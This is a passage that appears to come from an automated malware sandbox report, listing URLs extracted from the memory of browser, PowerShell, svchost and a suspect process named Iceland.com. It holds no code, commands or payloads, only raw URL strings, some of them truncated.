Source: powershell.exe, 00000003.00000002.2123581484.000001A510071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2123581484.000001A510071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 00000018.00000002.2721957410.000054DC00194000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
Source: chrome.exe, 00000018.00000002.2721957410.000054DC00194000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1B
Source: chrome.exe, 00000018.00000002.2737416308.000054DC01340000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.googl0
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000018.00000002.2733200663.000054DC01188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729196399.000054DC00CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000018.00000002.2733200663.000054DC01188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webappapp
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/doglT
Source: chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
Source: chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultnjb
Source: chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/njb
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724673902.000054DC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724723078.000054DC0083C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724673902.000054DC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724723078.000054DC0083C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724673902.000054DC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724723078.000054DC0083C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000018.00000002.2723861274.000054DC00708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000018.00000002.2733200663.000054DC01188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729196399.000054DC00CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000018.00000002.2723861274.000054DC00708000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/oglT
Source: chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723167042.000054DC00544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000018.00000002.2734607653.000054DC01330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724440969.000054DC007A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729196399.000054DC00CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722652300.000054DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000018.00000002.2722652300.000054DC0036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp0A
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000018.00000002.2723167042.000054DC00544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000018.00000002.2734607653.000054DC01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/oglT
Source: chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723167042.000054DC00544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729235814.000054DC00D18000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000018.00000002.2726226100.000054DC00A68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000018.00000002.2726226100.000054DC00A68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2734607653.000054DC01330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000018.00000002.2734607653.000054DC01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
Source: chrome.exe, 00000018.00000002.2734607653.000054DC01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2dT
Source: chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2m
Source: chrome.exe, 00000018.00000002.2726226100.000054DC00A68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000018.00000002.2733200663.000054DC01188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2726226100.000054DC00A68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000018.00000002.2724139396.000054DC00730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723515837.000054DC00650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000018.00000002.2724139396.000054DC00730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: Iceland.com, 00000015.00000002.3338924888.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728509553.000054DC00C98000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr, Web Data.37.dr, GVS0HV.21.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Iceland.com, 00000015.00000002.3338924888.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723677359.000054DC006B0000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr, Web Data.37.dr, GVS0HV.21.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000018.00000002.2723677359.000054DC006B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabn
Source: chrome.exe, 00000018.00000002.2723677359.000054DC006B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: Iceland.com, 00000015.00000002.3338924888.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr, Web Data.37.dr, GVS0HV.21.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000019.00000003.2634995492.000002891D223000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.25.dr, edb.log.25.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000019.00000003.2634995492.000002891D1B0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.25.dr, edb.log.25.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000003.00000002.2106520526.000001A500229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2106520526.000001A50162F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/#
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/0
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/7
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/B
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/N
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/O
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/T
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/V
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/X
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/a
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/d
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/j
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/w
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/z
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000018.00000003.2680386737.000054DC024F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: msedge.exe, 00000024.00000002.3053691246.00005E34002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000018.00000002.2723581690.000054DC00670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000018.00000002.2722598019.000054DC00358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ickegcp.p
Source: Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724673902.000054DC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724723078.000054DC0083C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724673902.000054DC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724723078.000054DC0083C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000018.00000003.2676498915.000054DC02890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000018.00000003.2676498915.000054DC02890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000018.00000002.2719981280.00002EA800237000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2720962944.00002EA800904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard.
Source: chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000018.00000003.2676498915.000054DC02890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardT
Source: chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000018.00000002.2720962944.00002EA800904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000018.00000002.2720962944.00002EA800904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000018.00000002.2722915743.000054DC0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000018.00000003.2632475644.00002EA80087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
